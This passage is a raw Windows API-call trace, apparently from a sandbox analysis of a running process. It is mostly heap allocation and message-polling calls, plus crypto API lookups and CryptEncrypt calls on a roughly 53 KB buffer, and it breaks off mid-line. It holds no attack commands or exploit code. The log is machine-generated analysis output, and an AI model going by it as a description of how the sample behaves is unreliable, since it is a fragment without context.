(HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0186.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0186.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0186.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0186.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0186.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0186.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0186.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0186.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0186.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0186.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0186.780] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0186.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0186.780] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0186.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0186.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0186.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0186.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0186.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0186.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0186.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0186.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0186.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0186.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0186.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0186.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0186.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0186.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0186.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0186.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0186.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0186.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0186.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0186.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0186.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0186.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0186.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0186.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0186.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0186.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0186.781] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0186.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0186.781] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0186.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0186.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0186.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0186.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0186.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0186.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0186.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0186.782] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0186.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0186.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0186.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0186.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0186.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0186.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0186.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0186.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0186.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0186.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0186.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0186.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0186.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0186.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0186.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0186.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0186.782] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0186.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0186.782] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0186.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0186.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0186.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0186.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0186.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0186.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0186.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0186.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0186.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0186.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0186.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0186.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0186.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0186.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0186.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0186.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0186.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0186.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0186.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0186.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0186.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0186.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0186.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0186.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0186.783] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0186.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0186.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0186.783] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0186.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0186.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0186.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0186.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0186.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0186.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0186.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0186.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0186.784] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0186.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x11) returned 0x90d420 [0186.784] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d420, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0186.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0186.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0186.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0186.784] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0186.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0186.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0186.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0186.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0186.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0186.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0186.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0186.784] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0186.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0186.784] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0186.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0186.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0186.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0186.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0186.785] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c2758, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2758*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0186.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0186.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0186.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0186.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0186.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0186.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0186.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0186.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0186.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0186.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0186.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0186.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0186.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0186.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0186.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0186.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0186.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0186.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0186.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0186.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0186.785] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0186.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0186.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0186.785] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0186.786] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0186.786] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0186.786] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.786] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.786] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.786] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0186.786] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.786] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.786] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0186.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0186.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0186.786] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.786] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0186.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0186.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0186.786] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0186.786] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0186.786] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.786] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0186.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0186.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0186.786] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0186.786] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0186.786] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0186.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0186.787] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0186.787] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.787] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.787] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0186.787] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.787] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0186.787] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0186.787] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0186.787] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.787] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xd1c3, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xd1d0) returned 1 [0186.787] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.787] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0186.788] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.788] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.788] CharLowerBuffW (in: lpsz="byte[53713]", cchLength=0xb | out: lpsz="byte[53713]") returned 0xb [0186.788] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.789] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.803] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0186.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0186.803] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0186.803] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.803] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa6c1d8*, pdwDataLen=0x87e820*=0xd1c3, dwBufLen=0xd1d0 | out: pbData=0xa6c1d8*, pdwDataLen=0x87e820*=0xd1d0) returned 1 [0186.804] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.804] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0186.804] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.805] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.805] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.805] PeekMessageW (in: 